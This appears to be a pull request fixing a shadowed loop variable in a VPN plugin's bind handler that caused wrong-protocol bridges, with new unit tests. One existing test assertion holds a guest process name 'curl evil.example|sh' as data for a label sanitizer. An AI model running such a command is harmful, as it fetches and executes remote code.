### PR TITLE
vpn: fix shadowed sock_type causing non-deterministic wrong-protocol bridges

### DIFF
--- a/pyplugins/actuation/vpn.py
+++ b/pyplugins/actuation/vpn.py
@@ -392,12 +392,16 @@ class VPN(Plugin):
                 # Find all wild_ips, log this IP
                 self.seen_ips.add(ip)
 
-                # For any previously-wild_ip service, bridge it with this new IP
-                for sock_type, seen_port, seen_procname in self.wild_ips:
+                # For any previously-wild_ip service, bridge it with this new IP.
+                # These loop targets must not reuse this function's parameter
+                # names: a loop variable leaks into the enclosing scope, so
+                # binding `sock_type` here would clobber the real bind's
+                # protocol before it is used below.
+                for wild_sock_type, seen_port, seen_procname in self.wild_ips:
                     host_port = self.bridge(
-                        sock_type, ip, seen_port, seen_procname, ipvn
+                        wild_sock_type, ip, seen_port, seen_procname, ipvn
                     )  # If unsupported or guest-host ports actually match, we skip this
-                    plugins.publish(self, "on_bind", sock_type, ip, seen_port, host_port, self.exposed_ip, procname)
+                    plugins.publish(self, "on_bind", wild_sock_type, ip, seen_port, host_port, self.exposed_ip, seen_procname)
 
         host_port = self.bridge(sock_type, ip, port, procname, ipvn)
         plugins.publish(self, "on_bind", sock_type, ip, port, host_port, self.exposed_ip, procname)

--- a/tests/unit/test_vpn_connect.py
+++ b/tests/unit/test_vpn_connect.py
@@ -1,16 +1,18 @@
-"""Host-side tests for the VPN plugin's endpoints listing (endpoints.txt).
+"""Host-side tests for the VPN plugin (endpoints listing and bind dispatch).
 
 The VPN plugin's __init__ launches host-side processes (vpn/vsock bridges), so
-it isn't null-backend-loadable via penguin.testing.load_pyplugin. endpoints.txt
-is produced by a pure, side-effect-free helper, so we exercise that directly on
-an instance built with __new__ (no __init__), setting only the attributes it
-reads. The in-guest path is covered by the tests/integration test_target
+it isn't null-backend-loadable via penguin.testing.load_pyplugin. The helpers
+under test here are pure or easily isolated, so we exercise them directly on an
+instance built with __new__ (no __init__), setting only the attributes they
+read. The in-guest path is covered by the tests/integration test_target
 netbinds.yaml verifier conditions.
 """
 import importlib.util
 import sys
 import types
 from pathlib import Path
+
+import pytest
 
 REPO_ROOT = Path(__file__).resolve().parents[2]
 VPN = REPO_ROOT / "pyplugins" / "actuation" / "vpn.py"
@@ -63,3 +65,84 @@ def test_endpoints_sanitizes_guest_procname(tmp_path):
     # One line, newline neutralized to '?'.
     assert endpoints == "tcp 192.168.100.2:8080 -> 0.0.0.0:8080 (x?curl evil.example|sh #)\n"
     assert mod._sanitize_label("tab\there") == "tab?here"
+
+
+# --- on_bind dispatch ------------------------------------------------------
+#
+# When a bind arrives on a not-yet-seen concrete IP, on_bind first re-bridges
+# every previously-wildcarded service onto that IP, then bridges the bind that
+# actually fired. The re-bridge loop must not clobber the real bind's own
+# arguments: a Python loop target leaks into the enclosing function scope, so
+# reusing a parameter name there silently rewrites the pending bind. Because
+# wild_ips is a set, which entry lands last varies per process (string hash
+# randomization), which made the resulting corruption non-deterministic.
+
+
+def _bind_vpn(mod, wild_ips):
+    """A VPN instance wired up for on_bind, with bridge/publish captured."""
+    vpn = mod.VPN.__new__(mod.VPN)
+    vpn.exposed_ip = "192.168.100.2"
+    vpn.seen_ips = set()
+    vpn.wild_ips = wild_ips
+    vpn.active_listeners = set()
+
+    vpn.bridged = []
+    vpn.published = []
+
+    def fake_bridge(sock_type, ip, guest_port, procname, ipvn):
+        vpn.bridged.append((sock_type, ip, guest_port, procname))
+        return 10000 + guest_port
+
+    vpn.bridge = fake_bridge
+
+    class _Plugins:
+        def publish(self, _self, _event, proto, guest_ip, guest_port, host_port, host_ip, procname):
+            vpn.published.append((proto, guest_ip, guest_port, procname))
+
+    mod.plugins = _Plugins()
+    return vpn
+
+
+def test_on_bind_new_ip_keeps_its_own_protocol():
+    """A TCP bind on a newly-seen IP must be bridged as TCP even though the
+    wildcard re-bridge loop above it just handled a UDP service."""
+    mod = _load_vpn_module("vpn_plugin_on_bind_proto")
+    vpn = _bind_vpn(mod, {("udp", 4444, "netcat")})
+
+    vpn.on_bind("tcp", 4, "192.168.0.1", 9999, "lighttpd")
+
+    # Last bridge/publish belong to the bind that actually fired.
+    assert vpn.bridged[-1] == ("tcp", "192.168.0.1", 9999, "lighttpd")
+    assert vpn.published[-1] == ("tcp", "192.168.0.1", 9999, "lighttpd")
+
+
+@pytest.mark.parametrize("order", [
+    [("tcp", 8000, "httpd"), ("udp", 4444, "netcat")],
+    [("udp", 4444, "netcat"), ("tcp", 8000, "httpd")],
+])
+def test_on_bind_new_ip_protocol_survives_any_wild_order(order):
+    """Whatever order wild_ips iterates in, the pending bind's protocol stands.
+
+    wild_ips is a set in production, so its order is not ours to choose; a list
+    is substituted here to pin down both orderings deterministically.
+    """
+    mod = _load_vpn_module("vpn_plugin_on_bind_order")
+    vpn = _bind_vpn(mod, order)
+
+    vpn.on_bind("tcp", 4, "192.168.0.1", 9999, "lighttpd")
+
+    assert vpn.bridged[-1] == ("tcp", "192.168.0.1", 9999, "lighttpd")
+    assert vpn.published[-1] == ("tcp", "192.168.0.1", 9999, "lighttpd")
+
+
+def test_on_bind_rebridged_wildcard_keeps_its_own_procname():
+    """A wildcard service re-bridged onto a new IP is still owned by the
+    process that bound the wildcard, not by whoever bound the new IP. The
+    published event must agree with what bridge() recorded."""
+    mod = _load_vpn_module("vpn_plugin_on_bind_procname")
+    vpn = _bind_vpn(mod, {("tcp", 80, "httpd")})
+
+    vpn.on_bind("tcp", 4, "192.168.0.1", 9999, "lighttpd")
+
+    assert vpn.bridged[0] == ("tcp", "192.168.0.1", 80, "httpd")
+    assert vpn.published[0] == ("tcp", "192.168.0.1", 80, "httpd")


### PR DESCRIPTION
## The bug

`VPN.on_bind()` re-bridges every previously-wildcarded service onto a newly-seen guest IP before bridging the bind that actually fired. The loop target reused the function's own `sock_type` parameter:

```python
def on_bind(self, sock_type, ipvn, ip, port, procname):
    ...
    elif ip not in self.seen_ips:
        self.seen_ips.add(ip)
        for sock_type, seen_port, seen_procname in self.wild_ips:   # clobbers the param
            ...
    host_port = self.bridge(sock_type, ip, port, procname, ipvn)    # no longer this bind's proto
```

Python loop variables leak into the enclosing function scope, so by the last two lines `sock_type` is whichever protocol came last out of `self.wild_ips` — not the protocol of the bind being handled.

`wild_ips` is a `set` of tuples containing strings, so its iteration order derives from randomized string hashes and differs from process to process. **A TCP service discovered on a new guest IP is bridged as UDP on some runs and TCP on others.**

## Impact

* Wrong socket type written to the VPN event line (`_do_bridge`), so the host-side forwarder stands up the wrong kind of socket and the service is unreachable.
* Wrong protocol recorded in `vpn_bridges.csv` and `endpoints.txt`.
* `bridges_made` keyed with a protocol that disagrees with `active_listeners`, so `save_state`/`on_restore` re-establishes the bridge wrong after a snapshot restore.
* The published `on_bind` event carries the wrong protocol, so proto-filtering subscribers silently never fire.

Already observed in the wild: `pyplugins/testing/owned_iface_test.py` carries a comment that the `tcp :8010` bind is *"sometimes reported late or as udp, and missing it stranded the whole test"*, and deliberately avoids keying on it. That workaround is left in place here.

## Reproduction

Wildcard `udp/4444`, wildcard `tcp/8000`, then a real `tcp <ip>:9999`. Across `PYTHONHASHSEED=0..9` the TCP service was bridged as **udp on 7 seeds and tcp on 3**. Pure host-side Python; no emulator involved.

## The fix

Rename the loop targets to `wild_sock_type` so the parameter survives. Smallest change that removes the defect; the sets are left as sets, since nothing downstream reads their order once the leak is gone.

Also folded in a related one-word correction on the same lines: the in-loop `publish()` passed the outer `procname` while the `bridge()` call directly above it recorded `seen_procname`. A wildcard service re-bridged onto a new IP is still owned by the process that bound the wildcard, so the event and the CSV now agree. This one is deterministic rather than order-dependent, and no in-tree subscriber currently reads the field.

## Tests

Four cases added to `tests/unit/test_vpn_connect.py`, reusing its existing `__new__`-based harness. Seeding `wild_ips` with a single opposite-protocol entry makes the leak fire 100% of the time, so these fail deterministically rather than intermittently:

| Test | Before | After |
|---|---|---|
| `test_on_bind_new_ip_keeps_its_own_protocol` | FAIL | pass |
| `..._survives_any_wild_order[tcp,udp]` | FAIL | pass |
| `..._survives_any_wild_order[udp,tcp]` | pass | pass |
| `test_on_bind_rebridged_wildcard_keeps_its_own_procname` | FAIL | pass |

The parametrized pair is the coin flip made explicit — the two cases differ only in `wild_ips` ordering and exactly one of them breaks.

## Verification notes

Ran the four unit files that reference the VPN plugin (`test_vpn_connect`, `test_pyplugin_harness`, `test_netbinds_lifecycle`, `test_nmap`): 32 passed. The full `tests/unit` suite was not run to completion locally — it exceeds 600s on my host, and `tests/unit/test_stubs.py` fails at import against an older site-packages `penguin`. Both are pre-existing local environment issues unrelated to this change; leaving the full sweep to CI.